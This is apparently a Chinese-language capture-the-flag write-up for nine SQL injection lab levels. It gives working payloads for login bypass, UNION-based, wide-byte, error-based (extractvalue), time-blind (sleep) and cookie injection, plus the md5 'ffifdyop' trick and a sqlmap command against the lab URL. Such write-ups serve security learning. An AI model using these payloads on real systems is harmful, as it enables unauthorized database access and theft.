第一关
万能密码:username='or '1'='1'# password=1 即可登录得到flag。
第二关
最基础的注入,order by 判断字段数,然后 union select 查询表,列,字段。
payload:id=1 union select 1,database(),3 from information_schema.tables where table_schema=database()%23 得到数据库名,之后自己发挥。。。。
第三关
懵逼了很长时间,一看大佬的wp,秒懂,脑回路不行,没想到这个。。。。
宽字节注入,就是用繁体字的url编码吃掉反斜杠,payload;id=1%df%27union%20select%201,database(),3%20from%20information_schema.tables%20where%20table_schema=database()%23
第四关
这个题到是真的没有接触过,limit注入,我直接sqlmap跑的,原谅菜鸡。。。。。
第五关
这个题也比较头疼,图片注入,牛逼牛逼。。。。图片注入而且要用宽字节。。
第六关
报错注入,终于能自己操作操作了,没什么过滤,直接上payload:username=admin' and extractvalue(1,(concat(0x3c,(select database() from information_schema.schemata limit 0,1))))%23
然后查看源码,得到数据库名。
第七关
盲注,想到用 if(),sleep()等函数,payload:username=guest' and if(1,sleep(5),1)%23
页面返回延迟5秒,所以存在盲注,写爆破脚本吧。
第八关
能输入的地方都不存在注入,抓包,试试cookie,存在注入,哈哈。。给cookie一个值就可以了,如:cookie:id=.........;PHPSSIONID=11111111
sqlmap:sqlmap -u http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1 --cookie "id=1;PHPSESSID=0f83b91303f3eb5aa68c9f47b8e2c4ae" --dbs --level 2
第九关
感觉很熟悉,但是想不起来了,我的个脑子啊。求助大佬。
得知 是 md5 注入,MD5有一个特殊的字符串ffifdyop
加密后的MD5是276f722736c95d99e921722cf9ed621c
再变成字符串就成了'or'6<trash>
就造成了注入,tqltql。。。。
还需继续努力学习。